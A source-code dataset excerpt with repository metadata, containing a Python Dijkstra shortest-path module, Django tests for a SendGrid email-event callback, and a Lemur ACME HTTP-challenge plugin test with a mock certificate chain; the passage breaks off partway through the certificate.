2020-10-21T05:54:34.000Z
|
2022-02-04T12:47:55.000Z
|
tests/mocks/__init__.py
|
Informasjonsforvaltning/fdk-model-publisher
|
f9f2434436fbbc4e66a9747d8fb2b7f07bb76533
|
[
"Apache-2.0"
] | null | null | null |
"""Initialize mocks."""
from .data_services_catalog_ttl import data_services_catalog_ttl_mock
from .skagerrak_sparebank_json import skagerrak_sparebank_json_mock
from .skagerrak_sparebank_ttl import skagerrak_sparebank_ttl_mock
| 38.166667
| 69
| 0.89083
| 31
| 229
| 6.032258
| 0.387097
| 0.385027
| 0.203209
| 0.235294
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.065502
| 229
| 5
| 70
| 45.8
| 0.873832
| 0.074236
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e6bacb0f7117086b77b371afbaf9b99e1d6d4ed8
| 12,354
|
py
|
Python
|
control/shortestpath/dijkstra_sc.py
|
gmarciani/ipath
|
6c367b969fd5363c92672ebabfd4e2b01e866af4
|
[
"MIT"
] | null | null | null |
control/shortestpath/dijkstra_sc.py
|
gmarciani/ipath
|
6c367b969fd5363c92672ebabfd4e2b01e866af4
|
[
"MIT"
] | null | null | null |
control/shortestpath/dijkstra_sc.py
|
gmarciani/ipath
|
6c367b969fd5363c92672ebabfd4e2b01e866af4
|
[
"MIT"
] | null | null | null |
from common_sc import get_random_nodes, get_couples_sc, get_couples_sc_isolated_test
from time import clock
from model.tree import RelationTree as Tree
from model.priority_queue import DHeap as PriorityQueue
from sets import Set
INFINITE = float("inf")
#Nessun vincolo di minimizzazzione
def dijkstra_sc_0(graph, numNodes, maxDistance = INFINITE):
randomNodes = get_random_nodes(graph, numNodes)
couples = get_couples_sc(randomNodes, maxDistance)
result = Set()
for couple in couples:
rootNode = couple[0]
destNode = couple[1]
data = _dijkstra_sc_0(graph, rootNode, destNode, maxDistance)
result.add(data)
return result
def _dijkstra_sc_0(graph, rootNode, destNode, maxDistance):
NOT_WALKABLE = clock()
pathTree = Tree(rootNode._id)
pathCost = dict.fromkeys(graph._nodes.iterkeys(), INFINITE)
pathCost[rootNode._id] = 0.0
Q = PriorityQueue()
Q.insert(rootNode._id, 0.0)
while not Q.is_empty():
minNodeId = Q.delete_min().element
for arc in graph.get_incident_arcs(minNodeId):
if arc.status == NOT_WALKABLE: continue
tailNodeCost = pathCost[minNodeId]
arcCost = arc.info
headNodeId = arc._head
headNodeCost = pathCost[headNodeId]
if headNodeCost == INFINITE:
newCost = tailNodeCost + arcCost
pathCost[headNodeId] = newCost
Q.insert(headNodeId, newCost)
pathTree.insert(minNodeId, headNodeId)
graph.set_arc_status(headNodeId, minNodeId, NOT_WALKABLE)
elif (tailNodeCost + arcCost) < headNodeCost:
prevFatherNodeId = pathTree.get_father(headNodeId)
graph.set_arc_status(headNodeId, prevFatherNodeId, None)
newCost = tailNodeCost + arcCost
pathCost[headNodeId] = newCost
Q.decrease_key(headNodeId, newCost)
pathTree.make_son(minNodeId, headNodeId)
graph.set_arc_status(headNodeId, minNodeId, NOT_WALKABLE)
couple = (rootNode._id, destNode._id)
try:
path = pathTree.get_path_to(destNode._id)
except KeyError:
path = None
cost = pathCost[destNode._id]
return (couple, path, cost)
#Vincolo 1 di minimizzazione |V(G)|
def dijkstra_sc_1(graph, numNodes, maxDistance = INFINITE):
randomNodes = get_random_nodes(graph, numNodes)
couples = get_couples_sc(randomNodes, maxDistance)
result = Set()
for couple in couples:
rootNode = couple[0]
destNode = couple[1]
data = _dijkstra_sc_1(graph, rootNode, destNode, maxDistance)
result.add(data)
return result
def _dijkstra_sc_1(graph, rootNode, destNode, maxDistance):
OUT_OF_RANGE = - rootNode._id - clock()
NOT_WALKABLE = clock()
pathTree = Tree(rootNode._id)
pathCost = dict.fromkeys(graph._nodes.iterkeys(), INFINITE)
pathCost[rootNode._id] = 0.0
Q = PriorityQueue()
Q.insert(rootNode._id, 0.0)
while not Q.is_empty():
minNodeId = Q.delete_min().element
for arc in graph.get_incident_arcs(minNodeId):
if arc.status == NOT_WALKABLE: continue
headNodeId = arc._head
headNode = graph.get_node_by_id(headNodeId)
if headNode.status == OUT_OF_RANGE: continue
else:
newCost = pathCost[minNodeId] + arc.info
if newCost >= pathCost[destNode._id]:
headNode.status = OUT_OF_RANGE
continue
tailNodeCost = pathCost[minNodeId]
arcCost = arc.info
headNodeCost = pathCost[headNodeId]
if headNodeCost == INFINITE:
newCost = tailNodeCost + arcCost
pathCost[headNodeId] = newCost
Q.insert(headNodeId, newCost)
pathTree.insert(minNodeId, headNodeId)
graph.set_arc_status(headNodeId, minNodeId, NOT_WALKABLE)
elif (tailNodeCost + arcCost) < headNodeCost:
prevFatherNodeId = pathTree.get_father(headNodeId)
graph.set_arc_status(headNodeId, prevFatherNodeId, None)
newCost = tailNodeCost + arcCost
pathCost[headNodeId] = newCost
Q.decrease_key(headNodeId, newCost)
pathTree.make_son(minNodeId, headNodeId)
graph.set_arc_status(headNodeId, minNodeId, NOT_WALKABLE)
couple = (rootNode._id, destNode._id)
try:
path = pathTree.get_path_to(destNode._id)
except KeyError:
path = None
cost = pathCost[destNode._id]
return (couple, path, cost)
#Vincoli 1 e 2 di minimizzazione di |V(G)|
def dijkstra_sc_2(graph, numNodes, maxDistance = INFINITE):
randomNodes = get_random_nodes(graph, numNodes)
couples = get_couples_sc_isolated_test(randomNodes, maxDistance)
result = Set()
for couple in [c for c in couples if c[2] is None]:
rootNode = couple[0]
destNode = couple[1]
data = _dijkstra_sc_2(graph, rootNode, destNode, maxDistance)
result.add(data)
for couple in [c for c in couples if c[2] is not None]:
rootNode = couple[0]
destNode = couple[1]
data = ((rootNode._id, destNode._id), None, INFINITE)
result.add(data)
return result
def _dijkstra_sc_2(graph, rootNode, destNode, maxDistance):
OUT_OF_RANGE = - rootNode._id - clock()
NOT_WALKABLE = clock()
pathTree = Tree(rootNode._id)
pathCost = dict.fromkeys(graph._nodes.iterkeys(), INFINITE)
pathCost[rootNode._id] = 0.0
Q = PriorityQueue()
Q.insert(rootNode._id, 0.0)
while not Q.is_empty():
minNodeId = Q.delete_min().element
for arc in graph.get_incident_arcs(minNodeId):
if arc.status == NOT_WALKABLE: continue
headNodeId = arc._head
headNode = graph.get_node_by_id(headNodeId)
if headNode.status == OUT_OF_RANGE: continue
else:
newCost = pathCost[minNodeId] + arc.info
if newCost >= pathCost[destNode._id]:
headNode.status = OUT_OF_RANGE
continue
tailNodeCost = pathCost[minNodeId]
arcCost = arc.info
headNodeCost = pathCost[headNodeId]
if headNodeCost == INFINITE:
newCost = tailNodeCost + arcCost
pathCost[headNodeId] = newCost
Q.insert(headNodeId, newCost)
pathTree.insert(minNodeId, headNodeId)
graph.set_arc_status(headNodeId, minNodeId, NOT_WALKABLE)
elif (tailNodeCost + arcCost) < headNodeCost:
prevFatherNodeId = pathTree.get_father(headNodeId)
graph.set_arc_status(headNodeId, prevFatherNodeId, None)
newCost = tailNodeCost + arcCost
pathCost[headNodeId] = newCost
Q.decrease_key(headNodeId, newCost)
pathTree.make_son(minNodeId, headNodeId)
graph.set_arc_status(headNodeId, minNodeId, NOT_WALKABLE)
couple = (rootNode._id, destNode._id)
try:
path = pathTree.get_path_to(destNode._id)
except KeyError:
path = None
cost = pathCost[destNode._id]
return (couple, path, cost)
#Vincoli 1,2 e 3 di minimizzazione di |V(G)|
def dijkstra_sc_3(graph, numNodes, maxDistance = INFINITE):
randomNodes = get_random_nodes(graph, numNodes)
couples = get_couples_sc_isolated_test(randomNodes, maxDistance)
result = Set()
for couple in [c for c in couples if c[2] is None]:
rootNode = couple[0]
destNode = couple[1]
data = _dijkstra_sc_3(graph, rootNode, destNode, maxDistance)
result.add(data)
for couple in [c for c in couples if c[2] is not None]:
rootNode = couple[0]
destNode = couple[1]
data = ((rootNode._id, destNode._id), None, INFINITE)
result.add(data)
return result
def _dijkstra_sc_3(graph, rootNode, destNode, maxDistance):
OUT_OF_RANGE = - rootNode._id - clock()
NOT_WALKABLE = clock()
pathTree = Tree(rootNode._id)
pathCost = dict.fromkeys(graph._nodes.iterkeys(), INFINITE)
pathCost[rootNode._id] = 0.0
Q = PriorityQueue()
Q.insert(rootNode._id, 0.0)
while not Q.is_empty():
minNodeId = Q.delete_min().element
for arc in graph.get_incident_arcs(minNodeId):
if arc.status == NOT_WALKABLE: continue
headNodeId = arc._head
headNode = graph.get_node_by_id(headNodeId)
if headNode.status == OUT_OF_RANGE: continue
else:
newCost = pathCost[minNodeId] + arc.info
if (headNodeId != destNode._id and headNode._deg == 1) or newCost >= pathCost[destNode._id]:
headNode.status = OUT_OF_RANGE
continue
tailNodeCost = pathCost[minNodeId]
arcCost = arc.info
headNodeCost = pathCost[headNodeId]
if headNodeCost == INFINITE:
newCost = tailNodeCost + arcCost
pathCost[headNodeId] = newCost
Q.insert(headNodeId, newCost)
pathTree.insert(minNodeId, headNodeId)
graph.set_arc_status(headNodeId, minNodeId, NOT_WALKABLE)
elif (tailNodeCost + arcCost) < headNodeCost:
prevFatherNodeId = pathTree.get_father(headNodeId)
graph.set_arc_status(headNodeId, prevFatherNodeId, None)
newCost = tailNodeCost + arcCost
pathCost[headNodeId] = newCost
Q.decrease_key(headNodeId, newCost)
pathTree.make_son(minNodeId, headNodeId)
graph.set_arc_status(headNodeId, minNodeId, NOT_WALKABLE)
couple = (rootNode._id, destNode._id)
try:
path = pathTree.get_path_to(destNode._id)
except KeyError:
path = None
cost = pathCost[destNode._id]
return (couple, path, cost)
def __test(func, graph, numNodes, maxDistance):
from utils.map_utils import isolation, blocking_nodes, average_node_deg, average_arc_weight
print "### iPATH TEST ALGORITHM"
print "### Type: Shortest Path"
print "### Implementation: {}".format(str(func.__name__))
print "### Num. Random Nodes: {}".format(str(numNodes))
print "### Max Distance: {}".format(str(maxDistance))
print "###"
print "### Nodes: {}".format(str(graph.get_num_nodes()))
print "### Arcs: {}".format(str(graph.get_num_arcs()))
print "### Deg: {} deg/node".format(str(average_node_deg(graph)))
print "### Weight: {} meters/arc".format(str(average_arc_weight(graph)))
print "### Blocking: {} %".format(str(blocking_nodes(graph)))
print "### Isolation: {} %\n".format(str(isolation(graph)))
print "Computing Result . . ."
result = func(graph, numNodes, maxDistance)
print "\n*** RESULT ***\n"
print result
print "\n### END OF TEST ###\n"
if __name__ == "__main__":
from test.__init__ import TEST_SOURCE_REAL_ROME as TEST
from control.parse.c_element_tree import cElementTreeParser
FUNCS = [dijkstra_sc_0,
dijkstra_sc_1,
dijkstra_sc_2,
dijkstra_sc_3]
source = TEST
print "Source: {}".format(source)
print "Parsing Graph . . .\n"
graph = cElementTreeParser().parse_file(source)
num_nodes = 200
max_distance = 100
for func in FUNCS:
__test(func, graph, num_nodes, max_distance)
| 39.343949
| 108
| 0.589526
| 1,279
| 12,354
| 5.486317
| 0.112588
| 0.029927
| 0.030782
| 0.035913
| 0.83369
| 0.820009
| 0.820009
| 0.80818
| 0.798774
| 0.798774
| 0
| 0.007281
| 0.321839
| 12,354
| 314
| 109
| 39.343949
| 0.83027
| 0.012223
| 0
| 0.794574
| 0
| 0
| 0.027131
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.031008
| null | null | 0.069767
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fc1069151df3b1b95353bda9d37294b7177e55da
| 13,528
|
py
|
Python
|
sendgrid/tests/test_views.py
|
mattijevi/django-sendgrid
|
f930cb1759ea034a4a54dc1e077e8e8bb8b7206b
|
[
"BSD-2-Clause"
] | 7
|
2015-03-29T05:56:50.000Z
|
2018-09-13T09:48:18.000Z
|
sendgrid/tests/test_views.py
|
mattijevi/django-sendgrid
|
f930cb1759ea034a4a54dc1e077e8e8bb8b7206b
|
[
"BSD-2-Clause"
] | 10
|
2015-02-12T17:06:21.000Z
|
2019-11-28T07:59:22.000Z
|
sendgrid/tests/test_views.py
|
mattijevi/django-sendgrid
|
f930cb1759ea034a4a54dc1e077e8e8bb8b7206b
|
[
"BSD-2-Clause"
] | 9
|
2015-01-02T06:27:13.000Z
|
2019-06-19T02:11:10.000Z
|
from django.test import TestCase, Client
from django.conf import settings
import json
from sendgrid import utils, models
class BaseTest(TestCase):
def setUp(self):
self.client = Client(enforce_csrf_checks=True)
self.email_data = {'subject': 'Test Subject',
'body': 'Hi, I am a test body',
'from_email': 'email@example.com',
'to': ('other_email@example.com', )}
super(BaseTest, self).setUp()
class ViewTestCase(BaseTest):
def test_callback_view(self):
""" Test email callback.
"""
message = utils.SendgridEmailMessage(**self.email_data)
message.send()
# test initial email state
self.assertEqual(models.Email.objects.count(), 1)
self.assertEqual(models.Email.objects.all()[0].event, 'initiated')
# simulate callback by sendgrid
response = self.client.post('/sendgrid_callback/',
data=json.dumps([{
'email': 'other_email@example.com',
'uuid': message.uuid,
'event': 'processed',
'timestamp': '123456789',
}, ]),
content_type='application/json')
self.assertEqual(response.status_code, 200)
# this should have modified the existing email model
self.assertEqual(models.Email.objects.count(), 1)
self.assertEqual(models.Email.objects.all()[0].event, 'processed')
def test_callback_view_error(self):
""" Test the callback view with erroneous data.
"""
message = utils.SendgridEmailMessage(**self.email_data)
message.send()
# test initial email state
self.assertEqual(models.Email.objects.count(), 1)
self.assertEqual(models.Email.objects.all()[0].event, 'initiated')
# simulate callback by sendgrid
with self.assertRaises(models.Email.DoesNotExist):
self.client.post('/sendgrid_callback/',
data=json.dumps([{'email': 'other_email@example.com',
'uuid': '333',
'event': 'processed',
'timestamp': '123456789', }, ]),
content_type='application/json')
# nothing should have changed
self.assertEqual(models.Email.objects.count(), 1)
self.assertEqual(models.Email.objects.all()[0].event, 'initiated')
def test_callback_with_missing_data(self):
""" Test the callback view with erroneous data.
"""
message = utils.SendgridEmailMessage(**self.email_data)
message.send()
# test initial email state
self.assertEqual(models.Email.objects.count(), 1)
self.assertEqual(models.Email.objects.all()[0].event, 'initiated')
# simulate callback by sendgrid
with self.assertRaises(KeyError):
self.client.post('/sendgrid_callback/',
data=json.dumps([{'email': 'other_email@example.com',
'event': 'processed',
'timestamp': '123456789', }, ]),
content_type='application/json')
# nothing should have changed
self.assertEqual(models.Email.objects.count(), 1)
self.assertEqual(models.Email.objects.all()[0].event, 'initiated')
def test_wrong_transition(self):
""" Test what happens if we try to do a wrong state transition
"""
message = utils.SendgridEmailMessage(**self.email_data)
message.send()
# test initial email state
self.assertEqual(models.Email.objects.count(), 1)
_mail = models.Email.objects.all()[0]
self.assertEqual(_mail.event, 'initiated')
_mail.event = 'bounce'
_mail.save()
# simulate callback by sendgrid
response = self.client.post('/sendgrid_callback/',
data=json.dumps([{
'email': 'other_email@example.com',
'uuid': message.uuid,
'event': 'processed',
'timestamp': '123456789',
}, ]),
content_type='application/json')
self.assertEqual(response.status_code, 200)
# nothing should have changed
self.assertEqual(models.Email.objects.count(), 1)
self.assertEqual(models.Email.objects.all()[0].event, 'bounce')
def test_state_transitions(self):
""" Test normal state transitions.
"""
message = utils.SendgridEmailMessage(**self.email_data)
message.send()
# test initial email state
self.assertEqual(models.Email.objects.count(), 1)
self.assertEqual(models.Email.objects.all()[0].event, 'initiated')
# simulate callback by sendgrid
response = self.client.post('/sendgrid_callback/',
data=json.dumps([{
'email': 'other_email@example.com',
'uuid': message.uuid,
'event': 'processed',
'timestamp': '123456789',
}, ]),
content_type='application/json')
self.assertEqual(response.status_code, 200)
# this should have modified the existing email model
self.assertEqual(models.Email.objects.count(), 1)
self.assertEqual(models.Email.objects.all()[0].event, 'processed')
# simulate next callback by sendgrid
response = self.client.post('/sendgrid_callback/',
data=json.dumps([{
'email': 'other_email@example.com',
'uuid': message.uuid,
'event': 'delivered',
'timestamp': '123459999',
}, ]),
content_type='application/json')
self.assertEqual(response.status_code, 200)
# this should have modified the existing email model
self.assertEqual(models.Email.objects.count(), 1)
self.assertEqual(models.Email.objects.all()[0].event, 'delivered')
def test_null_reason(self):
""" Test what happens if we send a null value as a reason, opposed to a missing reason.
"""
message = utils.SendgridEmailMessage(**self.email_data)
message.send()
# test initial email state
self.assertEqual(models.Email.objects.count(), 1)
self.assertEqual(models.Email.objects.all()[0].event, 'initiated')
# simulate callback by sendgrid
response = self.client.post('/sendgrid_callback/',
data=json.dumps([{
'email': 'other_email@example.com',
'uuid': message.uuid,
'event': 'processed',
'timestamp': '123456789',
'reason': None,
}, ]),
content_type='application/json')
self.assertEqual(response.status_code, 200)
# this should have modified the existing email model
self.assertEqual(models.Email.objects.count(), 1)
self.assertEqual(models.Email.objects.all()[0].event, 'processed')
def test_wrong_saved_state(self):
""" Test what happens if we saved a non-existent state in our email
"""
message = utils.SendgridEmailMessage(**self.email_data)
message.send()
# test initial email state
self.assertEqual(models.Email.objects.count(), 1)
_mail = models.Email.objects.all()[0]
self.assertEqual(_mail.event, 'initiated')
_mail.event = 'bacon'
_mail.save()
# simulate callback by sendgrid
with self.assertRaises(KeyError):
self.client.post('/sendgrid_callback/',
data=json.dumps([{'email': 'other_email@example.com',
'uuid': message.uuid,
'event': 'processed',
'timestamp': '123456789', }, ]),
content_type='application/json')
class ViewTZTestCase(ViewTestCase):
""" Test explicitly with USE_TZ enabled.
"""
def setUp(self):
self._old_use_tz = settings.USE_TZ
settings.USE_TZ = True
super(ViewTZTestCase, self).setUp()
def tearDown(self):
settings.USE_TZ = self._old_use_tz
super(ViewTZTestCase, self).tearDown()
class ViewNoTZTestCase(ViewTestCase):
""" Test explicitly with USE_TZ disabled.
"""
def setUp(self):
self._old_use_tz = settings.USE_TZ
settings.USE_TZ = False
super(ViewNoTZTestCase, self).setUp()
def tearDown(self):
settings.USE_TZ = self._old_use_tz
super(ViewNoTZTestCase, self).tearDown()
class IgnoreMissingTestCase(BaseTest):
""" Test cases for SENDGRID_EVENTS_IGNORE_MISSING enabled.
"""
def setUp(self):
super(IgnoreMissingTestCase, self).setUp()
settings.SENDGRID_EVENTS_IGNORE_MISSING = True
def tearDown(self):
del settings.SENDGRID_EVENTS_IGNORE_MISSING
super(IgnoreMissingTestCase, self).tearDown()
def test_callback_view_lenient_errors(self):
""" Test callback using a non-existent, malformed UUID.
"""
message = utils.SendgridEmailMessage(**self.email_data)
message.send()
# test initial email state
self.assertEqual(models.Email.objects.count(), 1)
self.assertEqual(models.Email.objects.all()[0].event, 'initiated')
# simulate callback by sendgrid
response = self.client.post('/sendgrid_callback/',
data=json.dumps([{
'email': 'other_email@example.com',
'uuid': '333',
'event': 'processed',
'timestamp': '123456789',
}, ]),
content_type='application/json')
self.assertEqual(response.status_code, 200)
# nothing should have changed
self.assertEqual(models.Email.objects.count(), 1)
self.assertEqual(models.Email.objects.all()[0].event, 'initiated')
def test_callback_with_missing_data(self):
""" Test callback with missing data (no UUID).
This is the default case if emails are not sent with our Classes
"""
message = utils.SendgridEmailMessage(**self.email_data)
message.send()
# test initial email state
self.assertEqual(models.Email.objects.count(), 1)
self.assertEqual(models.Email.objects.all()[0].event, 'initiated')
# simulate callback by sendgrid
response = self.client.post('/sendgrid_callback/',
data=json.dumps([{
'email': 'other_email@example.com',
'event': 'processed',
'timestamp': '123456789',
}, ]),
content_type='application/json')
self.assertEqual(response.status_code, 200)
# nothing should have changed
self.assertEqual(models.Email.objects.count(), 1)
self.assertEqual(models.Email.objects.all()[0].event, 'initiated')
def test_wrong_saved_state(self):
""" Test what happens if we saved a non-existent state in our email
"""
message = utils.SendgridEmailMessage(**self.email_data)
message.send()
# test initial email state
self.assertEqual(models.Email.objects.count(), 1)
_mail = models.Email.objects.all()[0]
self.assertEqual(_mail.event, 'initiated')
_mail.event = 'bacon'
_mail.save()
# simulate callback by sendgrid
response = self.client.post('/sendgrid_callback/',
data=json.dumps([{
'email': 'other_email@example.com',
'uuid': message.uuid,
'event': 'processed',
'timestamp': '123456789',
}, ]),
content_type='application/json')
self.assertEqual(response.status_code, 200)
# nothing should have changed
self.assertEqual(models.Email.objects.count(), 1)
self.assertEqual(models.Email.objects.all()[0].event, 'bacon')
| 41.624615
| 95
| 0.524468
| 1,233
| 13,528
| 5.652068
| 0.112733
| 0.103315
| 0.103315
| 0.13804
| 0.841728
| 0.828383
| 0.811738
| 0.811738
| 0.811738
| 0.811738
| 0
| 0.019738
| 0.36709
| 13,528
| 324
| 96
| 41.753086
| 0.794207
| 0.129731
| 0
| 0.811594
| 0
| 0
| 0.118228
| 0.023697
| 0
| 0
| 0
| 0
| 0.246377
| 1
| 0.082126
| false
| 0
| 0.019324
| 0
| 0.125604
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fc3062bbd4b3ec7dd3af2ea3e1a9dd87497d624e
| 18,056
|
py
|
Python
|
lemur/plugins/lemur_acme/tests/test_acme_http.py
|
dck25/lemur
|
32dda00f9fb4b72091bb3f4e7be1d262ea5fd857
|
[
"Apache-2.0"
] | 1,656
|
2015-09-20T03:12:28.000Z
|
2022-03-29T18:00:54.000Z
|
lemur/plugins/lemur_acme/tests/test_acme_http.py
|
dck25/lemur
|
32dda00f9fb4b72091bb3f4e7be1d262ea5fd857
|
[
"Apache-2.0"
] | 3,017
|
2015-09-18T23:15:24.000Z
|
2022-03-30T22:40:02.000Z
|
lemur/plugins/lemur_acme/tests/test_acme_http.py
|
hosseinsh/lemur
|
fbf50b365cb0f7a0e9cae31dec1b853b958c45bb
|
[
"Apache-2.0"
] | 401
|
2015-09-18T23:02:18.000Z
|
2022-02-20T16:13:14.000Z
|
import unittest
from unittest.mock import patch, Mock
from acme import challenges
from flask import Flask
from lemur.plugins.lemur_acme import plugin
class TestAcmeHttp(unittest.TestCase):
def setUp(self):
self.ACMEHttpIssuerPlugin = plugin.ACMEHttpIssuerPlugin()
self.acme = plugin.AcmeHandler()
# Creates a new Flask application for a test duration. In python 3.8, manual push of application context is
# needed to run tests in dev environment without getting error 'Working outside of application context'.
_app = Flask('lemur_test_acme')
self.ctx = _app.app_context()
assert self.ctx
self.ctx.push()
def tearDown(self):
self.ctx.pop()
def test_create_authority(self):
options = {
"plugin": {"plugin_options": [{"name": "certificate", "value": "123"}]},
"name": "mock_authority"
}
acme_root, b, role = self.ACMEHttpIssuerPlugin.create_authority(options)
self.assertEqual(acme_root, "123")
self.assertEqual(b, "")
self.assertEqual(role, [{"username": "", "password": "", "name": "acme_mock_authority"}])
@patch("lemur.plugins.lemur_acme.plugin.AcmeHandler.setup_acme_client")
@patch("lemur.plugins.base.manager.PluginManager.get")
@patch("lemur.plugins.lemur_acme.challenge_types.destination_service")
@patch("lemur.plugins.lemur_acme.plugin.AcmeHandler.request_certificate")
@patch("lemur.plugins.lemur_acme.plugin.authorization_service")
def test_create_certificate(
self,
mock_authorization_service,
mock_request_certificate,
mock_destination_service,
mock_plugin_manager_get,
mock_acme,
):
provider = plugin.ACMEHttpIssuerPlugin()
mock_authority = Mock()
mock_authority.options = '[{"name": "tokenDestination", "value": "mock-sftp-destination"}]'
mock_order_resource = Mock()
mock_order_resource.authorizations = [Mock()]
mock_order_resource.authorizations[0].body.challenges = [Mock()]
mock_order_resource.authorizations[0].body.challenges[0].response_and_validation.return_value = (
Mock(), "Anything-goes")
mock_order_resource.authorizations[0].body.challenges[0].chall = challenges.HTTP01(
token=b'\x0f\x1c\xbe#od\xd1\x9c\xa6j\\\xa4\r\xed\xe5\xbf0pz\xeaxnl)\xea[i\xbc\x95\x08\x96\x1f')
mock_client = Mock()
mock_client.new_order.return_value = mock_order_resource
mock_client.answer_challenge.return_value = True
mock_finalized_order = Mock()
mock_finalized_order.fullchain_pem = """
-----BEGIN CERTIFICATE-----
MIIEqzCCApOgAwIBAgIRAIvhKg5ZRO08VGQx8JdhT+UwDQYJKoZIhvcNAQELBQAw
GjEYMBYGA1UEAwwPRmFrZSBMRSBSb290IFgxMB4XDTE2MDUyMzIyMDc1OVoXDTM2
MDUyMzIyMDc1OVowIjEgMB4GA1UEAwwXRmFrZSBMRSBJbnRlcm1lZGlhdGUgWDEw
ggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDtWKySDn7rWZc5ggjz3ZB0
8jO4xti3uzINfD5sQ7Lj7hzetUT+wQob+iXSZkhnvx+IvdbXF5/yt8aWPpUKnPym
oLxsYiI5gQBLxNDzIec0OIaflWqAr29m7J8+NNtApEN8nZFnf3bhehZW7AxmS1m0
ZnSsdHw0Fw+bgixPg2MQ9k9oefFeqa+7Kqdlz5bbrUYV2volxhDFtnI4Mh8BiWCN
xDH1Hizq+GKCcHsinDZWurCqder/afJBnQs+SBSL6MVApHt+d35zjBD92fO2Je56
dhMfzCgOKXeJ340WhW3TjD1zqLZXeaCyUNRnfOmWZV8nEhtHOFbUCU7r/KkjMZO9
AgMBAAGjgeMwgeAwDgYDVR0PAQH/BAQDAgGGMBIGA1UdEwEB/wQIMAYBAf8CAQAw
HQYDVR0OBBYEFMDMA0a5WCDMXHJw8+EuyyCm9Wg6MHoGCCsGAQUFBwEBBG4wbDA0
BggrBgEFBQcwAYYoaHR0cDovL29jc3Auc3RnLXJvb3QteDEubGV0c2VuY3J5cHQu
b3JnLzA0BggrBgEFBQcwAoYoaHR0cDovL2NlcnQuc3RnLXJvb3QteDEubGV0c2Vu
Y3J5cHQub3JnLzAfBgNVHSMEGDAWgBTBJnSkikSg5vogKNhcI5pFiBh54DANBgkq
hkiG9w0BAQsFAAOCAgEABYSu4Il+fI0MYU42OTmEj+1HqQ5DvyAeyCA6sGuZdwjF
UGeVOv3NnLyfofuUOjEbY5irFCDtnv+0ckukUZN9lz4Q2YjWGUpW4TTu3ieTsaC9
AFvCSgNHJyWSVtWvB5XDxsqawl1KzHzzwr132bF2rtGtazSqVqK9E07sGHMCf+zp
DQVDVVGtqZPHwX3KqUtefE621b8RI6VCl4oD30Olf8pjuzG4JKBFRFclzLRjo/h7
IkkfjZ8wDa7faOjVXx6n+eUQ29cIMCzr8/rNWHS9pYGGQKJiY2xmVC9h12H99Xyf
zWE9vb5zKP3MVG6neX1hSdo7PEAb9fqRhHkqVsqUvJlIRmvXvVKTwNCP3eCjRCCI
PTAvjV+4ni786iXwwFYNz8l3PmPLCyQXWGohnJ8iBm+5nk7O2ynaPVW0U2W+pt2w
SVuvdDM5zGv2f9ltNWUiYZHJ1mmO97jSY/6YfdOUH66iRtQtDkHBRdkNBsMbD+Em
2TgBldtHNSJBfB3pm9FblgOcJ0FSWcUDWJ7vO0+NTXlgrRofRT6pVywzxVo6dND0
WzYlTWeUVsO40xJqhgUQRER9YLOLxJ0O6C8i0xFxAMKOtSdodMB3RIwt7RFQ0uyt
n5Z5MqkYhlMI3J1tPRTp1nEt9fyGspBOO05gi148Qasp+3N+svqKomoQglNoAxU=
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
MIIEqzCCApOgAwIBAgIRAIvhKg5ZRO08VGQx8JdhT+UwDQYJKoZIhvcNAQELBQAw
GjEYMBYGA1UEAwwPRmFrZSBMRSBSb290IFgxMB4XDTE2MDUyMzIyMDc1OVoXDTM2
MDUyMzIyMDc1OVowIjEgMB4GA1UEAwwXRmFrZSBMRSBJbnRlcm1lZGlhdGUgWDEw
ggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDtWKySDn7rWZc5ggjz3ZB0
8jO4xti3uzINfD5sQ7Lj7hzetUT+wQob+iXSZkhnvx+IvdbXF5/yt8aWPpUKnPym
oLxsYiI5gQBLxNDzIec0OIaflWqAr29m7J8+NNtApEN8nZFnf3bhehZW7AxmS1m0
ZnSsdHw0Fw+bgixPg2MQ9k9oefFeqa+7Kqdlz5bbrUYV2volxhDFtnI4Mh8BiWCN
xDH1Hizq+GKCcHsinDZWurCqder/afJBnQs+SBSL6MVApHt+d35zjBD92fO2Je56
dhMfzCgOKXeJ340WhW3TjD1zqLZXeaCyUNRnfOmWZV8nEhtHOFbUCU7r/KkjMZO9
AgMBAAGjgeMwgeAwDgYDVR0PAQH/BAQDAgGGMBIGA1UdEwEB/wQIMAYBAf8CAQAw
HQYDVR0OBBYEFMDMA0a5WCDMXHJw8+EuyyCm9Wg6MHoGCCsGAQUFBwEBBG4wbDA0
BggrBgEFBQcwAYYoaHR0cDovL29jc3Auc3RnLXJvb3QteDEubGV0c2VuY3J5cHQu
b3JnLzA0BggrBgEFBQcwAoYoaHR0cDovL2NlcnQuc3RnLXJvb3QteDEubGV0c2Vu
Y3J5cHQub3JnLzAfBgNVHSMEGDAWgBTBJnSkikSg5vogKNhcI5pFiBh54DANBgkq
hkiG9w0BAQsFAAOCAgEABYSu4Il+fI0MYU42OTmEj+1HqQ5DvyAeyCA6sGuZdwjF
UGeVOv3NnLyfofuUOjEbY5irFCDtnv+0ckukUZN9lz4Q2YjWGUpW4TTu3ieTsaC9
AFvCSgNHJyWSVtWvB5XDxsqawl1KzHzzwr132bF2rtGtazSqVqK9E07sGHMCf+zp
